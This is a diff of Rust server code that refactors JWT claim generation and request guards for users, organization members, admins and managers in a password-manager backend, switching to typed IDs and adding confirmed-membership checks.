pub grantor_email: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn generate_emergency_access_invite_claims(
|
pub fn generate_emergency_access_invite_claims(
|
||||||
uuid: String,
|
user_id: UserId,
|
||||||
email: String,
|
email: String,
|
||||||
emer_id: String,
|
emer_id: EmergencyAccessId,
|
||||||
grantor_name: String,
|
grantor_name: String,
|
||||||
grantor_email: String,
|
grantor_email: String,
|
||||||
) -> EmergencyAccessInviteJwtClaims {
|
) -> EmergencyAccessInviteJwtClaims {
|
||||||
let time_now = Utc::now().naive_utc();
|
let time_now = Utc::now();
|
||||||
let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
|
let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
|
||||||
EmergencyAccessInviteJwtClaims {
|
EmergencyAccessInviteJwtClaims {
|
||||||
nbf: time_now.timestamp(),
|
nbf: time_now.timestamp(),
|
||||||
exp: (time_now + Duration::hours(expire_hours)).timestamp(),
|
exp: (time_now + TimeDelta::try_hours(expire_hours).unwrap()).timestamp(),
|
||||||
iss: JWT_EMERGENCY_ACCESS_INVITE_ISSUER.to_string(),
|
iss: JWT_EMERGENCY_ACCESS_INVITE_ISSUER.to_string(),
|
||||||
sub: uuid,
|
sub: user_id,
|
||||||
email,
|
email,
|
||||||
emer_id,
|
emer_id,
|
||||||
grantor_name,
|
grantor_name,
|
||||||
@@ -225,20 +271,23 @@ pub struct OrgApiKeyLoginJwtClaims {
|
|||||||
// Issuer
|
// Issuer
|
||||||
pub iss: String,
|
pub iss: String,
|
||||||
// Subject
|
// Subject
|
||||||
pub sub: String,
|
pub sub: OrgApiKeyId,
|
||||||
|
|
||||||
pub client_id: String,
|
pub client_id: String,
|
||||||
pub client_sub: String,
|
pub client_sub: OrganizationId,
|
||||||
pub scope: Vec<String>,
|
pub scope: Vec<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn generate_organization_api_key_login_claims(uuid: String, org_id: String) -> OrgApiKeyLoginJwtClaims {
|
pub fn generate_organization_api_key_login_claims(
|
||||||
let time_now = Utc::now().naive_utc();
|
org_api_key_uuid: OrgApiKeyId,
|
||||||
|
org_id: OrganizationId,
|
||||||
|
) -> OrgApiKeyLoginJwtClaims {
|
||||||
|
let time_now = Utc::now();
|
||||||
OrgApiKeyLoginJwtClaims {
|
OrgApiKeyLoginJwtClaims {
|
||||||
nbf: time_now.timestamp(),
|
nbf: time_now.timestamp(),
|
||||||
exp: (time_now + Duration::hours(1)).timestamp(),
|
exp: (time_now + TimeDelta::try_hours(1).unwrap()).timestamp(),
|
||||||
iss: JWT_ORG_API_KEY_ISSUER.to_string(),
|
iss: JWT_ORG_API_KEY_ISSUER.to_string(),
|
||||||
sub: uuid,
|
sub: org_api_key_uuid,
|
||||||
client_id: format!("organization.{org_id}"),
|
client_id: format!("organization.{org_id}"),
|
||||||
client_sub: org_id,
|
client_sub: org_id,
|
||||||
scope: vec!["api.organization".into()],
|
scope: vec!["api.organization".into()],
|
||||||
@@ -254,22 +303,49 @@ pub struct FileDownloadClaims {
|
|||||||
// Issuer
|
// Issuer
|
||||||
pub iss: String,
|
pub iss: String,
|
||||||
// Subject
|
// Subject
|
||||||
pub sub: String,
|
pub sub: CipherId,
|
||||||
|
|
||||||
pub file_id: String,
|
pub file_id: AttachmentId,
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn generate_file_download_claims(uuid: String, file_id: String) -> FileDownloadClaims {
|
pub fn generate_file_download_claims(cipher_id: CipherId, file_id: AttachmentId) -> FileDownloadClaims {
|
||||||
let time_now = Utc::now().naive_utc();
|
let time_now = Utc::now();
|
||||||
FileDownloadClaims {
|
FileDownloadClaims {
|
||||||
nbf: time_now.timestamp(),
|
nbf: time_now.timestamp(),
|
||||||
exp: (time_now + Duration::minutes(5)).timestamp(),
|
exp: (time_now + TimeDelta::try_minutes(5).unwrap()).timestamp(),
|
||||||
iss: JWT_FILE_DOWNLOAD_ISSUER.to_string(),
|
iss: JWT_FILE_DOWNLOAD_ISSUER.to_string(),
|
||||||
sub: uuid,
|
sub: cipher_id,
|
||||||
file_id,
|
file_id,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(Debug, Serialize, Deserialize)]
|
||||||
|
pub struct RegisterVerifyClaims {
|
||||||
|
// Not before
|
||||||
|
pub nbf: i64,
|
||||||
|
// Expiration time
|
||||||
|
pub exp: i64,
|
||||||
|
// Issuer
|
||||||
|
pub iss: String,
|
||||||
|
// Subject
|
||||||
|
pub sub: String,
|
||||||
|
|
||||||
|
pub name: Option<String>,
|
||||||
|
pub verified: bool,
|
||||||
|
}
|
||||||
|
|
||||||
|
pub fn generate_register_verify_claims(email: String, name: Option<String>, verified: bool) -> RegisterVerifyClaims {
|
||||||
|
let time_now = Utc::now();
|
||||||
|
RegisterVerifyClaims {
|
||||||
|
nbf: time_now.timestamp(),
|
||||||
|
exp: (time_now + TimeDelta::try_minutes(30).unwrap()).timestamp(),
|
||||||
|
iss: JWT_REGISTER_VERIFY_ISSUER.to_string(),
|
||||||
|
sub: email,
|
||||||
|
name,
|
||||||
|
verified,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
#[derive(Debug, Serialize, Deserialize)]
|
#[derive(Debug, Serialize, Deserialize)]
|
||||||
pub struct BasicJwtClaims {
|
pub struct BasicJwtClaims {
|
||||||
// Not before
|
// Not before
|
||||||
@@ -283,42 +359,42 @@ pub struct BasicJwtClaims {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub fn generate_delete_claims(uuid: String) -> BasicJwtClaims {
|
pub fn generate_delete_claims(uuid: String) -> BasicJwtClaims {
|
||||||
let time_now = Utc::now().naive_utc();
|
let time_now = Utc::now();
|
||||||
let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
|
let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
|
||||||
BasicJwtClaims {
|
BasicJwtClaims {
|
||||||
nbf: time_now.timestamp(),
|
nbf: time_now.timestamp(),
|
||||||
exp: (time_now + Duration::hours(expire_hours)).timestamp(),
|
exp: (time_now + TimeDelta::try_hours(expire_hours).unwrap()).timestamp(),
|
||||||
iss: JWT_DELETE_ISSUER.to_string(),
|
iss: JWT_DELETE_ISSUER.to_string(),
|
||||||
sub: uuid,
|
sub: uuid,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn generate_verify_email_claims(uuid: String) -> BasicJwtClaims {
|
pub fn generate_verify_email_claims(user_id: UserId) -> BasicJwtClaims {
|
||||||
let time_now = Utc::now().naive_utc();
|
let time_now = Utc::now();
|
||||||
let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
|
let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
|
||||||
BasicJwtClaims {
|
BasicJwtClaims {
|
||||||
nbf: time_now.timestamp(),
|
nbf: time_now.timestamp(),
|
||||||
exp: (time_now + Duration::hours(expire_hours)).timestamp(),
|
exp: (time_now + TimeDelta::try_hours(expire_hours).unwrap()).timestamp(),
|
||||||
iss: JWT_VERIFYEMAIL_ISSUER.to_string(),
|
iss: JWT_VERIFYEMAIL_ISSUER.to_string(),
|
||||||
sub: uuid,
|
sub: user_id.to_string(),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn generate_admin_claims() -> BasicJwtClaims {
|
pub fn generate_admin_claims() -> BasicJwtClaims {
|
||||||
let time_now = Utc::now().naive_utc();
|
let time_now = Utc::now();
|
||||||
BasicJwtClaims {
|
BasicJwtClaims {
|
||||||
nbf: time_now.timestamp(),
|
nbf: time_now.timestamp(),
|
||||||
exp: (time_now + Duration::minutes(CONFIG.admin_session_lifetime())).timestamp(),
|
exp: (time_now + TimeDelta::try_minutes(CONFIG.admin_session_lifetime()).unwrap()).timestamp(),
|
||||||
iss: JWT_ADMIN_ISSUER.to_string(),
|
iss: JWT_ADMIN_ISSUER.to_string(),
|
||||||
sub: "admin_panel".to_string(),
|
sub: "admin_panel".to_string(),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn generate_send_claims(send_id: &str, file_id: &str) -> BasicJwtClaims {
|
pub fn generate_send_claims(send_id: &SendId, file_id: &SendFileId) -> BasicJwtClaims {
|
||||||
let time_now = Utc::now().naive_utc();
|
let time_now = Utc::now();
|
||||||
BasicJwtClaims {
|
BasicJwtClaims {
|
||||||
nbf: time_now.timestamp(),
|
nbf: time_now.timestamp(),
|
||||||
exp: (time_now + Duration::minutes(2)).timestamp(),
|
exp: (time_now + TimeDelta::try_minutes(2).unwrap()).timestamp(),
|
||||||
iss: JWT_SEND_ISSUER.to_string(),
|
iss: JWT_SEND_ISSUER.to_string(),
|
||||||
sub: format!("{send_id}/{file_id}"),
|
sub: format!("{send_id}/{file_id}"),
|
||||||
}
|
}
|
||||||
@@ -333,7 +409,7 @@ use rocket::{
|
|||||||
};
|
};
|
||||||
|
|
||||||
use crate::db::{
|
use crate::db::{
|
||||||
models::{Collection, Device, User, UserOrgStatus, UserOrgType, UserOrganization, UserStampException},
|
models::{Collection, Device, Membership, MembershipStatus, MembershipType, User, UserStampException},
|
||||||
DbConn,
|
DbConn,
|
||||||
};
|
};
|
||||||
|
|
||||||
@@ -355,8 +431,6 @@ impl<'r> FromRequest<'r> for Host {
|
|||||||
referer.to_string()
|
referer.to_string()
|
||||||
} else {
|
} else {
|
||||||
// Try to guess from the headers
|
// Try to guess from the headers
|
||||||
use std::env;
|
|
||||||
|
|
||||||
let protocol = if let Some(proto) = headers.get_one("X-Forwarded-Proto") {
|
let protocol = if let Some(proto) = headers.get_one("X-Forwarded-Proto") {
|
||||||
proto
|
proto
|
||||||
} else if env::var("ROCKET_TLS").is_ok() {
|
} else if env::var("ROCKET_TLS").is_ok() {
|
||||||
@@ -367,10 +441,8 @@ impl<'r> FromRequest<'r> for Host {
|
|||||||
|
|
||||||
let host = if let Some(host) = headers.get_one("X-Forwarded-Host") {
|
let host = if let Some(host) = headers.get_one("X-Forwarded-Host") {
|
||||||
host
|
host
|
||||||
} else if let Some(host) = headers.get_one("Host") {
|
|
||||||
host
|
|
||||||
} else {
|
} else {
|
||||||
""
|
headers.get_one("Host").unwrap_or_default()
|
||||||
};
|
};
|
||||||
|
|
||||||
format!("{protocol}://{host}")
|
format!("{protocol}://{host}")
|
||||||
@@ -383,7 +455,6 @@ impl<'r> FromRequest<'r> for Host {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub struct ClientHeaders {
|
pub struct ClientHeaders {
|
||||||
pub host: String,
|
|
||||||
pub device_type: i32,
|
pub device_type: i32,
|
||||||
pub ip: ClientIp,
|
pub ip: ClientIp,
|
||||||
}
|
}
|
||||||
@@ -393,7 +464,6 @@ impl<'r> FromRequest<'r> for ClientHeaders {
|
|||||||
type Error = &'static str;
|
type Error = &'static str;
|
||||||
|
|
||||||
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
||||||
let host = try_outcome!(Host::from_request(request).await).host;
|
|
||||||
let ip = match ClientIp::from_request(request).await {
|
let ip = match ClientIp::from_request(request).await {
|
||||||
Outcome::Success(ip) => ip,
|
Outcome::Success(ip) => ip,
|
||||||
_ => err_handler!("Error getting Client IP"),
|
_ => err_handler!("Error getting Client IP"),
|
||||||
@@ -403,7 +473,6 @@ impl<'r> FromRequest<'r> for ClientHeaders {
|
|||||||
request.headers().get_one("device-type").map(|d| d.parse().unwrap_or(14)).unwrap_or_else(|| 14);
|
request.headers().get_one("device-type").map(|d| d.parse().unwrap_or(14)).unwrap_or_else(|| 14);
|
||||||
|
|
||||||
Outcome::Success(ClientHeaders {
|
Outcome::Success(ClientHeaders {
|
||||||
host,
|
|
||||||
device_type,
|
device_type,
|
||||||
ip,
|
ip,
|
||||||
})
|
})
|
||||||
@@ -440,48 +509,44 @@ impl<'r> FromRequest<'r> for Headers {
|
|||||||
};
|
};
|
||||||
|
|
||||||
// Check JWT token is valid and get device and user from it
|
// Check JWT token is valid and get device and user from it
|
||||||
let claims = match decode_login(access_token) {
|
let Ok(claims) = decode_login(access_token) else {
|
||||||
Ok(claims) => claims,
|
err_handler!("Invalid claim")
|
||||||
Err(_) => err_handler!("Invalid claim"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let device_uuid = claims.device;
|
let device_id = claims.device;
|
||||||
let user_uuid = claims.sub;
|
let user_id = claims.sub;
|
||||||
|
|
||||||
let mut conn = match DbConn::from_request(request).await {
|
let mut conn = match DbConn::from_request(request).await {
|
||||||
Outcome::Success(conn) => conn,
|
Outcome::Success(conn) => conn,
|
||||||
_ => err_handler!("Error getting DB"),
|
_ => err_handler!("Error getting DB"),
|
||||||
};
|
};
|
||||||
|
|
||||||
let device = match Device::find_by_uuid_and_user(&device_uuid, &user_uuid, &mut conn).await {
|
let Some(device) = Device::find_by_uuid_and_user(&device_id, &user_id, &mut conn).await else {
|
||||||
Some(device) => device,
|
err_handler!("Invalid device id")
|
||||||
None => err_handler!("Invalid device id"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let user = match User::find_by_uuid(&user_uuid, &mut conn).await {
|
let Some(user) = User::find_by_uuid(&user_id, &mut conn).await else {
|
||||||
Some(user) => user,
|
err_handler!("Device has no user associated")
|
||||||
None => err_handler!("Device has no user associated"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if user.security_stamp != claims.sstamp {
|
if user.security_stamp != claims.sstamp {
|
||||||
if let Some(stamp_exception) =
|
if let Some(stamp_exception) =
|
||||||
user.stamp_exception.as_deref().and_then(|s| serde_json::from_str::<UserStampException>(s).ok())
|
user.stamp_exception.as_deref().and_then(|s| serde_json::from_str::<UserStampException>(s).ok())
|
||||||
{
|
{
|
||||||
let current_route = match request.route().and_then(|r| r.name.as_deref()) {
|
let Some(current_route) = request.route().and_then(|r| r.name.as_deref()) else {
|
||||||
Some(name) => name,
|
err_handler!("Error getting current route for stamp exception")
|
||||||
_ => err_handler!("Error getting current route for stamp exception"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
// Check if the stamp exception has expired first.
|
// Check if the stamp exception has expired first.
|
||||||
// Then, check if the current route matches any of the allowed routes.
|
// Then, check if the current route matches any of the allowed routes.
|
||||||
// After that check the stamp in exception matches the one in the claims.
|
// After that check the stamp in exception matches the one in the claims.
|
||||||
if Utc::now().naive_utc().timestamp() > stamp_exception.expire {
|
if Utc::now().timestamp() > stamp_exception.expire {
|
||||||
// If the stamp exception has been expired remove it from the database.
|
// If the stamp exception has been expired remove it from the database.
|
||||||
// This prevents checking this stamp exception for new requests.
|
// This prevents checking this stamp exception for new requests.
|
||||||
let mut user = user;
|
let mut user = user;
|
||||||
user.reset_stamp_exception();
|
user.reset_stamp_exception();
|
||||||
if let Err(e) = user.save(&mut conn).await {
|
if let Err(e) = user.save(&mut conn).await {
|
||||||
error!("Error updating user: {:#?}", e);
|
error!("Error updating user: {e:#?}");
|
||||||
}
|
}
|
||||||
err_handler!("Stamp exception is expired")
|
err_handler!("Stamp exception is expired")
|
||||||
} else if !stamp_exception.routes.contains(¤t_route.to_string()) {
|
} else if !stamp_exception.routes.contains(¤t_route.to_string()) {
|
||||||
@@ -507,12 +572,30 @@ pub struct OrgHeaders {
|
|||||||
pub host: String,
|
pub host: String,
|
||||||
pub device: Device,
|
pub device: Device,
|
||||||
pub user: User,
|
pub user: User,
|
||||||
pub org_user_type: UserOrgType,
|
pub membership_type: MembershipType,
|
||||||
pub org_user: UserOrganization,
|
pub membership_status: MembershipStatus,
|
||||||
pub org_id: String,
|
pub membership: Membership,
|
||||||
pub ip: ClientIp,
|
pub ip: ClientIp,
|
||||||
}
|
}
|
||||||
|
|
||||||
|
impl OrgHeaders {
|
||||||
|
fn is_member(&self) -> bool {
|
||||||
|
// NOTE: we don't care about MembershipStatus at the moment because this is only used
|
||||||
|
// where an invited, accepted or confirmed user is expected if this ever changes or
|
||||||
|
// if from_i32 is changed to return Some(Revoked) this check needs to be changed accordingly
|
||||||
|
self.membership_type >= MembershipType::User
|
||||||
|
}
|
||||||
|
fn is_confirmed_and_admin(&self) -> bool {
|
||||||
|
self.membership_status == MembershipStatus::Confirmed && self.membership_type >= MembershipType::Admin
|
||||||
|
}
|
||||||
|
fn is_confirmed_and_manager(&self) -> bool {
|
||||||
|
self.membership_status == MembershipStatus::Confirmed && self.membership_type >= MembershipType::Manager
|
||||||
|
}
|
||||||
|
fn is_confirmed_and_owner(&self) -> bool {
|
||||||
|
self.membership_status == MembershipStatus::Confirmed && self.membership_type == MembershipType::Owner
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
#[rocket::async_trait]
|
#[rocket::async_trait]
|
||||||
impl<'r> FromRequest<'r> for OrgHeaders {
|
impl<'r> FromRequest<'r> for OrgHeaders {
|
||||||
type Error = &'static str;
|
type Error = &'static str;
|
||||||
@@ -523,56 +606,50 @@ impl<'r> FromRequest<'r> for OrgHeaders {
|
|||||||
// org_id is usually the second path param ("/organizations/<org_id>"),
|
// org_id is usually the second path param ("/organizations/<org_id>"),
|
||||||
// but there are cases where it is a query value.
|
// but there are cases where it is a query value.
|
||||||
// First check the path, if this is not a valid uuid, try the query values.
|
// First check the path, if this is not a valid uuid, try the query values.
|
||||||
let url_org_id: Option<&str> = {
|
let url_org_id: Option<OrganizationId> = {
|
||||||
let mut url_org_id = None;
|
if let Some(Ok(org_id)) = request.param::<OrganizationId>(1) {
|
||||||
if let Some(Ok(org_id)) = request.param::<&str>(1) {
|
Some(org_id.clone())
|
||||||
if uuid::Uuid::parse_str(org_id).is_ok() {
|
} else if let Some(Ok(org_id)) = request.query_value::<OrganizationId>("organizationId") {
|
||||||
url_org_id = Some(org_id);
|
Some(org_id.clone())
|
||||||
}
|
} else {
|
||||||
|
None
|
||||||
}
|
}
|
||||||
|
|
||||||
if let Some(Ok(org_id)) = request.query_value::<&str>("organizationId") {
|
|
||||||
if uuid::Uuid::parse_str(org_id).is_ok() {
|
|
||||||
url_org_id = Some(org_id);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
url_org_id
|
|
||||||
};
|
};
|
||||||
|
|
||||||
match url_org_id {
|
match url_org_id {
|
||||||
Some(org_id) => {
|
Some(org_id) if uuid::Uuid::parse_str(&org_id).is_ok() => {
|
||||||
let mut conn = match DbConn::from_request(request).await {
|
let mut conn = match DbConn::from_request(request).await {
|
||||||
Outcome::Success(conn) => conn,
|
Outcome::Success(conn) => conn,
|
||||||
_ => err_handler!("Error getting DB"),
|
_ => err_handler!("Error getting DB"),
|
||||||
};
|
};
|
||||||
|
|
||||||
let user = headers.user;
|
let user = headers.user;
|
||||||
let org_user = match UserOrganization::find_by_user_and_org(&user.uuid, org_id, &mut conn).await {
|
let Some(membership) = Membership::find_by_user_and_org(&user.uuid, &org_id, &mut conn).await else {
|
||||||
Some(user) => {
|
err_handler!("The current user isn't member of the organization");
|
||||||
if user.status == UserOrgStatus::Confirmed as i32 {
|
|
||||||
user
|
|
||||||
} else {
|
|
||||||
err_handler!("The current user isn't confirmed member of the organization")
|
|
||||||
}
|
|
||||||
}
|
|
||||||
None => err_handler!("The current user isn't member of the organization"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
Outcome::Success(Self {
|
Outcome::Success(Self {
|
||||||
host: headers.host,
|
host: headers.host,
|
||||||
device: headers.device,
|
device: headers.device,
|
||||||
user,
|
user,
|
||||||
org_user_type: {
|
membership_type: {
|
||||||
if let Some(org_usr_type) = UserOrgType::from_i32(org_user.atype) {
|
if let Some(member_type) = MembershipType::from_i32(membership.atype) {
|
||||||
org_usr_type
|
member_type
|
||||||
} else {
|
} else {
|
||||||
// This should only happen if the DB is corrupted
|
// This should only happen if the DB is corrupted
|
||||||
err_handler!("Unknown user type in the database")
|
err_handler!("Unknown user type in the database")
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
org_user,
|
membership_status: {
|
||||||
org_id: String::from(org_id),
|
if let Some(member_status) = MembershipStatus::from_i32(membership.status) {
|
||||||
|
// NOTE: add additional check for revoked if from_i32 is ever changed
|
||||||
|
// to return Revoked status.
|
||||||
|
member_status
|
||||||
|
} else {
|
||||||
|
err_handler!("User status is either revoked or invalid.")
|
||||||
|
}
|
||||||
|
},
|
||||||
|
membership,
|
||||||
ip: headers.ip,
|
ip: headers.ip,
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
@@ -585,9 +662,9 @@ pub struct AdminHeaders {
|
|||||||
pub host: String,
|
pub host: String,
|
||||||
pub device: Device,
|
pub device: Device,
|
||||||
pub user: User,
|
pub user: User,
|
||||||
pub org_user_type: UserOrgType,
|
pub membership_type: MembershipType,
|
||||||
pub client_version: Option<String>,
|
|
||||||
pub ip: ClientIp,
|
pub ip: ClientIp,
|
||||||
|
pub org_id: OrganizationId,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[rocket::async_trait]
|
#[rocket::async_trait]
|
||||||
@@ -596,15 +673,14 @@ impl<'r> FromRequest<'r> for AdminHeaders {
|
|||||||
|
|
||||||
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
||||||
let headers = try_outcome!(OrgHeaders::from_request(request).await);
|
let headers = try_outcome!(OrgHeaders::from_request(request).await);
|
||||||
let client_version = request.headers().get_one("Bitwarden-Client-Version").map(String::from);
|
if headers.is_confirmed_and_admin() {
|
||||||
if headers.org_user_type >= UserOrgType::Admin {
|
|
||||||
Outcome::Success(Self {
|
Outcome::Success(Self {
|
||||||
host: headers.host,
|
host: headers.host,
|
||||||
device: headers.device,
|
device: headers.device,
|
||||||
user: headers.user,
|
user: headers.user,
|
||||||
org_user_type: headers.org_user_type,
|
membership_type: headers.membership_type,
|
||||||
client_version,
|
|
||||||
ip: headers.ip,
|
ip: headers.ip,
|
||||||
|
org_id: headers.membership.org_uuid,
|
||||||
})
|
})
|
||||||
} else {
|
} else {
|
||||||
err_handler!("You need to be Admin or Owner to call this endpoint")
|
err_handler!("You need to be Admin or Owner to call this endpoint")
|
||||||
@@ -612,30 +688,19 @@ impl<'r> FromRequest<'r> for AdminHeaders {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
impl From<AdminHeaders> for Headers {
|
|
||||||
fn from(h: AdminHeaders) -> Headers {
|
|
||||||
Headers {
|
|
||||||
host: h.host,
|
|
||||||
device: h.device,
|
|
||||||
user: h.user,
|
|
||||||
ip: h.ip,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// col_id is usually the fourth path param ("/organizations/<org_id>/collections/<col_id>"),
|
// col_id is usually the fourth path param ("/organizations/<org_id>/collections/<col_id>"),
|
||||||
// but there could be cases where it is a query value.
|
// but there could be cases where it is a query value.
|
||||||
// First check the path, if this is not a valid uuid, try the query values.
|
// First check the path, if this is not a valid uuid, try the query values.
|
||||||
fn get_col_id(request: &Request<'_>) -> Option<String> {
|
fn get_col_id(request: &Request<'_>) -> Option<CollectionId> {
|
||||||
if let Some(Ok(col_id)) = request.param::<String>(3) {
|
if let Some(Ok(col_id)) = request.param::<String>(3) {
|
||||||
if uuid::Uuid::parse_str(&col_id).is_ok() {
|
if uuid::Uuid::parse_str(&col_id).is_ok() {
|
||||||
return Some(col_id);
|
return Some(col_id.into());
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
if let Some(Ok(col_id)) = request.query_value::<String>("collectionId") {
|
if let Some(Ok(col_id)) = request.query_value::<String>("collectionId") {
|
||||||
if uuid::Uuid::parse_str(&col_id).is_ok() {
|
if uuid::Uuid::parse_str(&col_id).is_ok() {
|
||||||
return Some(col_id);
|
return Some(col_id.into());
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -649,8 +714,8 @@ pub struct ManagerHeaders {
|
|||||||
pub host: String,
|
pub host: String,
|
||||||
pub device: Device,
|
pub device: Device,
|
||||||
pub user: User,
|
pub user: User,
|
||||||
pub org_user_type: UserOrgType,
|
|
||||||
pub ip: ClientIp,
|
pub ip: ClientIp,
|
||||||
|
pub org_id: OrganizationId,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[rocket::async_trait]
|
#[rocket::async_trait]
|
||||||
@@ -659,7 +724,7 @@ impl<'r> FromRequest<'r> for ManagerHeaders {
|
|||||||
|
|
||||||
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
||||||
let headers = try_outcome!(OrgHeaders::from_request(request).await);
|
let headers = try_outcome!(OrgHeaders::from_request(request).await);
|
||||||
if headers.org_user_type >= UserOrgType::Manager {
|
if headers.is_confirmed_and_manager() {
|
||||||
match get_col_id(request) {
|
match get_col_id(request) {
|
||||||
Some(col_id) => {
|
Some(col_id) => {
|
||||||
let mut conn = match DbConn::from_request(request).await {
|
let mut conn = match DbConn::from_request(request).await {
|
||||||
@@ -667,7 +732,7 @@ impl<'r> FromRequest<'r> for ManagerHeaders {
|
|||||||
_ => err_handler!("Error getting DB"),
|
_ => err_handler!("Error getting DB"),
|
||||||
};
|
};
|
||||||
|
|
||||||
if !can_access_collection(&headers.org_user, &col_id, &mut conn).await {
|
if !Collection::can_access_collection(&headers.membership, &col_id, &mut conn).await {
|
||||||
err_handler!("The current user isn't a manager for this collection")
|
err_handler!("The current user isn't a manager for this collection")
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -678,8 +743,8 @@ impl<'r> FromRequest<'r> for ManagerHeaders {
|
|||||||
host: headers.host,
|
host: headers.host,
|
||||||
device: headers.device,
|
device: headers.device,
|
||||||
user: headers.user,
|
user: headers.user,
|
||||||
org_user_type: headers.org_user_type,
|
|
||||||
ip: headers.ip,
|
ip: headers.ip,
|
||||||
|
org_id: headers.membership.org_uuid,
|
||||||
})
|
})
|
||||||
} else {
|
} else {
|
||||||
err_handler!("You need to be a Manager, Admin or Owner to call this endpoint")
|
err_handler!("You need to be a Manager, Admin or Owner to call this endpoint")
|
||||||
@@ -704,8 +769,7 @@ pub struct ManagerHeadersLoose {
|
|||||||
pub host: String,
|
pub host: String,
|
||||||
pub device: Device,
|
pub device: Device,
|
||||||
pub user: User,
|
pub user: User,
|
||||||
pub org_user: UserOrganization,
|
pub membership: Membership,
|
||||||
pub org_user_type: UserOrgType,
|
|
||||||
pub ip: ClientIp,
|
pub ip: ClientIp,
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -715,13 +779,12 @@ impl<'r> FromRequest<'r> for ManagerHeadersLoose {
|
|||||||
|
|
||||||
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
||||||
let headers = try_outcome!(OrgHeaders::from_request(request).await);
|
let headers = try_outcome!(OrgHeaders::from_request(request).await);
|
||||||
if headers.org_user_type >= UserOrgType::Manager {
|
if headers.is_confirmed_and_manager() {
|
||||||
Outcome::Success(Self {
|
Outcome::Success(Self {
|
||||||
host: headers.host,
|
host: headers.host,
|
||||||
device: headers.device,
|
device: headers.device,
|
||||||
user: headers.user,
|
user: headers.user,
|
||||||
org_user: headers.org_user,
|
membership: headers.membership,
|
||||||
org_user_type: headers.org_user_type,
|
|
||||||
ip: headers.ip,
|
ip: headers.ip,
|
||||||
})
|
})
|
||||||
} else {
|
} else {
|
||||||
@@ -740,22 +803,18 @@ impl From<ManagerHeadersLoose> for Headers {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
async fn can_access_collection(org_user: &UserOrganization, col_id: &str, conn: &mut DbConn) -> bool {
|
|
||||||
org_user.has_full_access()
|
|
||||||
|| Collection::has_access_by_collection_and_user_uuid(col_id, &org_user.user_uuid, conn).await
|
|
||||||
}
|
|
||||||
|
|
||||||
impl ManagerHeaders {
|
impl ManagerHeaders {
|
||||||
pub async fn from_loose(
|
pub async fn from_loose(
|
||||||
h: ManagerHeadersLoose,
|
h: ManagerHeadersLoose,
|
||||||
collections: &Vec<String>,
|
collections: &Vec<CollectionId>,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> Result<ManagerHeaders, Error> {
|
) -> Result<ManagerHeaders, Error> {
|
||||||
for col_id in collections {
|
for col_id in collections {
|
||||||
if uuid::Uuid::parse_str(col_id).is_err() {
|
if uuid::Uuid::parse_str(col_id.as_ref()).is_err() {
|
||||||
err!("Collection Id is malformed!");
|
err!("Collection Id is malformed!");
|
||||||
}
|
}
|
||||||
if !can_access_collection(&h.org_user, col_id, conn).await {
|
if !Collection::can_access_collection(&h.membership, col_id, conn).await {
|
||||||
err!("You don't have access to all collections!");
|
err!("You don't have access to all collections!");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -764,17 +823,17 @@ impl ManagerHeaders {
|
|||||||
host: h.host,
|
host: h.host,
|
||||||
device: h.device,
|
device: h.device,
|
||||||
user: h.user,
|
user: h.user,
|
||||||
org_user_type: h.org_user_type,
|
|
||||||
ip: h.ip,
|
ip: h.ip,
|
||||||
|
org_id: h.membership.org_uuid,
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub struct OwnerHeaders {
|
pub struct OwnerHeaders {
|
||||||
pub host: String,
|
|
||||||
pub device: Device,
|
pub device: Device,
|
||||||
pub user: User,
|
pub user: User,
|
||||||
pub ip: ClientIp,
|
pub ip: ClientIp,
|
||||||
|
pub org_id: OrganizationId,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[rocket::async_trait]
|
#[rocket::async_trait]
|
